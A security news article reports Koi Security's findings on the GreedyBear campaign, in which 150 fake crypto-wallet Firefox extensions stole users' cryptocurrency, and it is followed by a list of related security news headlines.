Analysts at Koi Security discovered the malicious GreedyBear campaign, which is active in the Mozilla add-ons store. 150 malicious Firefox extensions have stolen cryptocurrency worth over $1 million from users.
Fraudulent extensions disguised themselves as popular crypto wallet extensions of well-known platforms, including MetaMask, TronLink, Exodus, and Rabby Wallet. Initially, they were uploaded to the store without malicious code to pass inspections and remained inactive for some time to accumulate fake positive reviews.
At a later stage of the attack, the extension publishers removed the original branding and replaced it with new names and logos, as well as injected malware into the code designed to steal wallet data and users’ IP addresses (likely for tracking or targeting purposes).
The malicious code acted as a keylogger, intercepting input data from form fields and pop-up windows, and then sending it to the attackers’ server.
Experts from Koi Security have notified Mozilla developers about their findings, and the malicious extensions have now been removed from the Firefox add-ons store.
However, researchers report that in addition to Firefox extensions, this operation involves dozens of Russian-language sites with pirated software, which contribute to the distribution of 500 different malware executables, as well as a network of sites posing as official resources of Trezor, Jupiter Wallet, and fake hardware wallet repair services.
All these sites are linked to a single IP address (185.208.156[.]66), which acts as a command server for GreedyBear.
In these cases, various trojans, info-stealers (such as Lumma), or even ransomware can be used as the malicious payload.
The report also mentions that the analysis of this campaign revealed clear artifacts indicating that the attackers are using AI.
“This allows attackers to scale their operations faster and easier than ever before, diversify their payloads, and evade detection,” experts write.
Additionally, the company warned that the operators of GreedyBear are clearly considering the possibility of distributing malware through the Chrome Web Store as well. The fact is, researchers discovered a malicious Chrome extension called Filecoin Wallet, which used the same logic to steal data and was linked to the aforementioned IP address.
It is worth noting that in June 2025, Mozilla developers introduced a new system for early detection of add-ons related to cryptocurrency scams. It creates risk profiles for each wallet extension available in the store and automatically warns about risks if a specified threshold is reached.
These warnings should prompt people who review add-ons to take a closer look at specific extensions, to remove malware from the store before it is used to empty users’ wallets.
2025.02.01 — Critical RCE vulnerability fixed in Cacti
A critical vulnerability has been discovered in the open-source Cacti framework: it enables an authenticated attacker to remotely execute arbitrary code. Vulnerability's ID is CVE-2025-22604; its…
Full article →
2025.02.23 — New JavaScript obfuscation technique uses invisible Unicode characters
According to Juniper Threat Labs , a new JavaScript obfuscation technique that uses invisible Unicode characters was used in a phishing attack targeting Political Action…
Full article →
2025.01.27 — YouTube plays hour-long ads to users with ad blockers
Users complain that YouTube plays very long unskippable ads. Sometimes such ads are longer than the video the person is watching. The issue was raised…
Full article →
2025.01.30 — Hackers use vulnerabilities in SimpleHelp RMM to attack corporate networks
Experts believe that recently patched vulnerabilities in SimpleHelp Remote Monitoring and Management (RMM) were used by attackers to gain initial access to corporate networks. A number…
Full article →
2025.03.18 — Black Basta ransomware group developed its own automated brute-forcing framework
According to EclecticIQ, Black Basta Ransomware-as-a-Service (RaaS) group has developed its own automated brute-forcing framework dubbed BRUTED. It's used to hack edge network devices…
Full article →
2025.03.24 — Alexa to stop processing data locally. All voice requests will be sent to Amazon Cloud
Amazon announced that the privacy option allowing users of Echo speakers to avoid sending their voice recordings to the company's cloud will no longer be supported. Effective March…
Full article →
2025.03.12 — Mass exploitation of PHP-CGI vulnerability in attacks targeting Japanese companies
GreyNoise and Cisco Talos experts warn that hackers are actively exploiting CVE-2024-4577, a critical PHP-CGI vulnerability that was discovered and fixed in early June 2024. CVE-2024-457…
Full article →
2025.03.10 — Nearly a million Windows computers impacted by a malvertising campaign
According to Microsoft, nearly 1 million Windows devices fell victim to a sophisticated malvertising campaign in recent months. Cybercriminals were able to steal credentials, cryptocurrency, and sensitive…
Full article →
2025.04.29 — FBI Offers 10 million USD for information on Salt Typhoon members
The FBI offers up to 10 million USD for information about members of the Chinese hacker group Salt Typhoon and last year's attack that had…
Full article →
2025.01.29 — Google to disable Sync in older Chrome versions
Google announced that in early 2025, Chrome Sync will be disabled in Chrome versions older than four years. Chrome Sync enables users to save and sync their…
Full article →